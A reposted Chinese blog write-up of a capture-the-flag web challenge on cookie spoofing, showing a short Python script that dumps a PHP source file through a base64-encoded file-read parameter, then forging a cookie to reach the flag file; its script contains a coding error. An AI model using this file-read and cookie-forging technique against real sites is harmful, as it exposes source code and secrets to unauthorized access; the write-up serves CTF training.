博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
COOKIE欺骗
阅读量:7223 次
发布时间:2019-06-29

本文共 907 字,大约阅读时间需要 3 分钟。

链接:http://ctf.idf.cn/index.php?g=game&m=article&a=index&id=40

开始攻关:这里这里→ 

进去之后就是cd67918e02086c10de8202a75ca31c256636bef519b576b.............

这时我们稍微有点眼力的话,可以看见url中file的值是base64编码,解密后是flag.txt,,,,因为之前接触过类似的题目,我的第一反应就是包含漏洞,将index.php编码,我们在为

第一个参数赋值数字时,从0开始尝试,发现到18之后是空白,,可以写一个python脚本趴下来

import requestsfile=open("index.php","wb")for i in range(19):       url="http://ctf.idf.cn/game/web/40/index.php?line="+str(i)+"&file=aW5kZXgucGhw"        r=r.get(url)        content=r.content        file.write(content)file.close()

我们可以得到index.php文件

'flag.txt', '1' =>'index.php', ); if(isset($_COOKIE['key']) && $_COOKIE['key']=='idf'){ $file_list[2]='flag.php'; } if(in_array($file, $file_list)){ $fa = file($file); echo $fa[$line]; }?>

意思就是,存在一个flag.php文件,我们需要添加cookie,key=idf

我们只需要借助火狐浏览器F9,添加cookie后,刷新,查看源文件

得到flag

转载于:https://www.cnblogs.com/Jdrops/p/5447859.html

你可能感兴趣的文章
PowerPath只认识部分HBA路径的解决方法
查看>>
基于cookie实现ztree树刷新后,展开状态不变
查看>>
golang C.CString 必须Free
查看>>
ios 动画的时候 如果加阴影 会卡顿的
查看>>
Linux中的15个基本‘ls’命令示例
查看>>
我的友情链接
查看>>
我的友情链接
查看>>
cut命令的使用
查看>>
linux下软链接和硬链接的区别
查看>>
ftp server使用
查看>>
Oracle同行合并分组
查看>>
你所不了解的静态路由特点及配置
查看>>
Ansible自动部署LNAMP
查看>>
JVM类加载机制面试题解析
查看>>
Hyper-V副本服务器,实现灾难恢复
查看>>
Android EditText部分特殊功能
查看>>
阿里云ECS(linux)磁盘满触发的mysql的表异常修复案例
查看>>
[转贴]迅雷十年反思
查看>>
CentOS vmware 安装驱动
查看>>
每天1实验-eigrp default-network (坚持就是经典)
查看>>